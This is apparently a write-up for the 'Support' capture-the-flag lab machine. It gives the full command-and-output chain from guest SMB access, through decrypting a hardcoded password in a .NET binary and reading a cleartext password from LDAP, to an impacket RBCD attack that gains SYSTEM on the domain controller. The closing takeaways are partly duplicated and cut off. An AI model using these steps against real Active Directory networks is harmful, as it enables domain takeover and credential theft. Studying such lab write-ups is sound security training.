Support.
Easy-rated Windows AD machine chaining unauthenticated SMB enumeration, static analysis
and credential extraction from a .NET binary, LDAP enumeration to find a cleartext password
in a user attribute, and a Resource-Based Constrained Delegation (RBCD) attack to escalate
to NT AUTHORITY\SYSTEM on the Domain Controller.
User Flag
85cd997117xxxxxxxxxxxxxxxxxxxxxx
Root Flag
9f7027023bxxxxxxxxxxxxxxxxxxxxxx
01Reconnaissance
Full port scan — classic DC profile for support.htb. WinRM on 5985 means a direct shell if we get valid credentials.
$ nmap -sC -sV -p- 10.129.230.181
PORT STATE SERVICE
53/tcp open dns
88/tcp open kerberos-sec
135/tcp open msrpc
445/tcp open microsoft-ds SMB
389/tcp open ldap
636/tcp open ldapssl
5985/tcp open wsman WinRM
9389/tcp open mc-nmf .NET Message Framing
02Foothold — SMB Enumeration
Guest authentication is enabled. Enumerate shares — support-tools is non-standard and readable.
$ nxc smb 10.129.230.181 -u 'guest' -p '' --shares
ADMIN$ Remote Admin
C$ Default share
IPC$ READ
NETLOGON Logon server share
support-tools READ ← non-standard
SYSVOL Logon server share
$ smbclient //10.129.230.181/support-tools
7-ZipPortable_21.07.paf.exe
npp.8.4.1.portable.x64.zip
putty.exe
SysinternalsSuite.zip
UserInfo.exe.zip ← custom binary, stands out
windirstat1_1_2_setup.exe
WiresharkPortable64_3.6.5.paf.exe
smb: \> get UserInfo.exe.zip
finding:
UserInfo.exe.zip is the only non-vendor custom tool — prime target for analysis.03Reversing UserInfo.exe
The binary is a .NET assembly. Decompile with ilspycmd — inside UserInfo.Services.Protected there's an XOR decryption routine with a hardcoded encrypted password and key.
$ ilspycmd UserInfo.exe
// UserInfo.Services.Protected
private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
private static byte[] key = Encoding.ASCII.GetBytes("armando");
public static string getPassword()
{
byte[] array = Convert.FromBase64String(enc_password);
for (int i = 0; i < array.Length; i++)
array[i] = (byte)((array[i] ^ key[i % key.Length]) ^ 0xDF);
return Encoding.Default.GetString(array);
}
// LdapQuery() uses: support\\ldap + getPassword()
Replicate the XOR decryption in Python to extract the plaintext password:
import base64
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"
data = base64.b64decode(enc_password)
result = bytes([data[i] ^ key[i % len(key)] ^ 0xDF for i in range(len(data))])
print(result.decode())
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
creds:
ldap : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz04LDAP Enumeration → WinRM
With the ldap service account, enumerate all user objects looking for non-standard attributes. The support user has their password stored in plaintext in the info field.
$ ldapsearch -x -H ldap://10.129.230.181 -D "ldap@support.htb" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" "(objectClass=user)" info
dn: CN=support,CN=Users,DC=support,DC=htb
info: Ironside47pleasure40Watchful
creds:
support : Ironside47pleasure40Watchful — stored in plaintext in the LDAP info attribute.
$ evil-winrm -i 10.129.230.181 -u support -p 'Ironside47pleasure40Watchful'
*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
85cd997117xxxxxxxxxxxxxxxxxxxxxx
05Privilege Escalation — RBCD
Run BloodHound to map the attack path. Key finding: Shared Support Accounts has GenericAll on DC$. Support is a member of that group, and has SeMachineAccountPrivilege — enough for a full RBCD attack.
$ bloodhound-python -u support -p 'Ironside47pleasure40Watchful' -d support.htb -ns 10.129.230.181 -c All --zip
Shared Support Accounts → GenericAll → DC$
RBCD plan: create fake machine account → write msDS-AllowedToActOnBehalfOfOtherIdentity on DC$ → S4U2Self + S4U2Proxy → ticket as Administrator → SYSTEM shell.
Step 1 — Create a fake machine account
$ impacket-addcomputer -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Password123' -dc-ip 10.129.230.181 'support.htb/support:Ironside47pleasure40Watchful'
[*] Successfully added machine account ATTACKERSYSTEM$ with password Password123.
Step 2 — Configure RBCD on DC$
$ impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC$' -action write 'support.htb/support:Ironside47pleasure40Watchful'
[*] Delegation rights modified successfully!
[*] ATTACKERSYSTEM$ can now impersonate users on DC$ via S4U2Proxy
Step 3 — Request service ticket as Administrator
$ impacket-getST -spn 'cifs/dc.support.htb' -impersonate Administrator -dc-ip 10.129.230.181 'support.htb/ATTACKERSYSTEM$:Password123'
[*] Saving ticket in Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
Step 4 — PSExec with the Kerberos ticket
$ export KRB5CCNAME='Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache'
$ impacket-psexec -k -no-pass support.htb/Administrator@dc.support.htb
C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop> type root.txt
9f7027023bxxxxxxxxxxxxxxxxxxxxxx
06Attack Chain Summary
Guest SMB → support-tools share
│
▼
UserInfo.exe → XOR decrypt hardcoded password
│
▼
ldap : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
│
▼
LDAP enum → info attribute → plaintext password
│
▼
support : Ironside47pleasure40Watchful
│
▼
WinRM shell → user.txt ✓
│
▼
BloodHound → Shared Support Accounts GenericAll on DC$
│
▼
RBCD: addcomputer → rbcd → getST → psexec
│
▼
NT AUTHORITY\SYSTEM → root.txt ✓
key takeaways:
· Sensitive data in SMB shares — readable shares should never contain internal tooling with hardcoded credentials
· Credentials in LDAP attributes —
· GenericAll on DC$ +
· RBCD — understanding S4U2Self and S4U2Proxy is essential for both attack and defense
· Sensitive data in SMB shares — readable shares should never contain internal tooling with hardcoded credentials
· Credentials in LDAP attributes —
info and description fields are readable by any authenticated domain user· GenericAll on DC$ +
SeMachineAccountPrivilege = direct path to domain compromise via RBCD· RBCD — understanding S4U2Self and S4U2Proxy is essential for both attack and defense